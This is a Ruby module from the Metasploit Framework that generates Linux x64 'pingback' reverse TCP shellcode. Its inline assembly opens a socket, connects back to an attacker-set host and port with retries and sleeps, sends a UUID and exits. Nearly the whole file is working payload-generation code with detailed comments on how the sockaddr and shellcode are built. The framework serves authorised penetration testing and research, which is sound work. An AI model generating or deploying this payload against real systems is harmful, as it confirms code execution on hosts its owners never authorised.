GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/linux/x64/pingback_reverse_tcp.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
module MetasploitModule
  # Byte length of the assembled shellcode, as recorded for the payload cache.
  CachedSize = 125

  include Msf::Payload::Linux::X64::Prepends
  include Msf::Payload::Single
  include Msf::Payload::Pingback
  include Msf::Payload::Pingback::Options

  # Registers the module metadata with the framework.
  #
  # @param info [Hash] caller-supplied info merged over the defaults below
  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'Linux x64 Pingback, Reverse TCP Inline',
        'Description' => 'Connect back to attacker and report UUID (Linux x64)',
        'Author' => [ 'bwatters-r7' ],
        'License' => MSF_LICENSE,
        'Platform' => 'linux',
        'Arch' => ARCH_X64,
        'Handler' => Msf::Handler::ReverseTcp,
        'Session' => Msf::Sessions::Pingback
      )
    )
  end

  # Assembles the pingback shellcode.
  #
  # The generated code opens an AF_INET/SOCK_STREAM socket, tries to connect
  # to LHOST:LPORT up to ReverseConnectRetries times (sleeping between
  # attempts), writes the pingback UUID to the socket and then exits with
  # status 1. There is no success exit path: after the write it jumps to
  # `failed`, so the process always terminates with exit(1).
  #
  # @param _opts [Hash] unused; accepted for interface compatibility
  # @return [String] raw shellcode bytes
  def generate(_opts = {})
    # 22 -> "0x00,0x16"
    # 4444 -> "0x11,0x5c"
    # LPORT is packed little-endian, followed by AF_INET (2) big-endian, and
    # read back as one big-endian 32-bit word. When the 64-bit immediate built
    # below is pushed onto the (little-endian) stack, this low dword lands in
    # memory as { sin_family = 2, sin_port = LPORT in network byte order }.
    encoded_port = [datastore['LPORT'].to_i, 2].pack('vn').unpack('N').first
    # addr_aton returns the address in network byte order; unpacking it as a
    # native 32-bit word means the same byte order is restored when the value
    # is written back to memory as the high dword (sin_addr).
    # NOTE: an unset LHOST falls back to 127.127.127.127 rather than raising.
    encoded_host = Rex::Socket.addr_aton(datastore['LHOST'] || '127.127.127.127').unpack('V').first
    # Host in the high 32 bits, family/port in the low 32 bits: one `mov rcx`
    # immediate that becomes the first 8 bytes of a sockaddr_in once pushed.
    encoded_host_port = format('0x%<encoded_host>.8x%<encoded_port>.8x', { encoded_host: encoded_host, encoded_port: encoded_port })
    # At least one connection attempt is made even if the option is 0/unset;
    # this value seeds r9, which counts total attempts, not extra retries.
    retry_count = [datastore['ReverseConnectRetries'].to_i, 1].max

    # Generate the UUID once per instance so repeated generate() calls emit the
    # same identifier; render it as comma-separated byte literals for `db`.
    self.pingback_uuid ||= generate_pingback_uuid
    uuid_as_db = '0x' + self.pingback_uuid.chars.each_slice(2).map(&:join).join(',0x')
    # Delay between connect attempts, split into the tv_sec / tv_nsec fields
    # of the struct timespec handed to nanosleep. With 5.0 the nanosecond
    # part is always 0.
    seconds = 5.0
    sleep_seconds = seconds.to_i
    sleep_nanoseconds = (seconds % 1 * 1_000_000_000).to_i

    # Register usage: r9 = remaining attempts (survives syscalls, which only
    # clobber rcx/r11); rdi = socket fd after the xchg; the 16-byte sockaddr
    # is the pushed rcx plus the 8 bytes already below it on the stack.
    # The `call get_uuid_address` / `pop rsi` pair obtains the address of the
    # inline `db` UUID bytes without needing RIP-relative addressing.
    asm = %^
      push #{retry_count} ; retry counter
      pop r9
      push rsi
      push rax
      push 0x29
      pop rax
      cdq
      push 0x2
      pop rdi
      push 0x1
      pop rsi
      syscall ; socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
      test rax, rax
      js failed

      xchg rdi, rax

      connect:
      mov rcx, #{encoded_host_port}
      push rcx
      mov rsi, rsp
      push 0x10
      pop rdx
      push 0x2a
      pop rax
      syscall ; connect(3, {sa_family=AF_INET, LPORT, LHOST, 16)
      pop rcx
      test rax, rax
      jns send_pingback

      handle_failure:
      dec r9
      jz failed
      push rdi
      push 0x23
      pop rax
      push 0x#{sleep_nanoseconds.to_s(16)}
      push 0x#{sleep_seconds.to_s(16)}
      mov rdi, rsp
      xor rsi, rsi
      syscall ; sys_nanosleep
      pop rcx
      pop rcx
      pop rdi
      test rax, rax
      jns connect

      failed:
      push 0x3c
      pop rax
      push 0x1
      pop rdi
      syscall ; exit(1)

      send_pingback:
      push #{uuid_as_db.split(',').length} ; length of the PINGBACK UUID
      pop rdx
      call get_uuid_address ; put uuid buffer on the stack
      db #{uuid_as_db} ; PINGBACK_UUID

      get_uuid_address:
      pop rsi ; UUID address
      xor rax, rax
      inc rax
      syscall ; sys_write

      jmp failed
    ^
    # Assemble with Metasm and return the raw bytes; CachedSize above must
    # match the length of this output.
    Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string
  end
end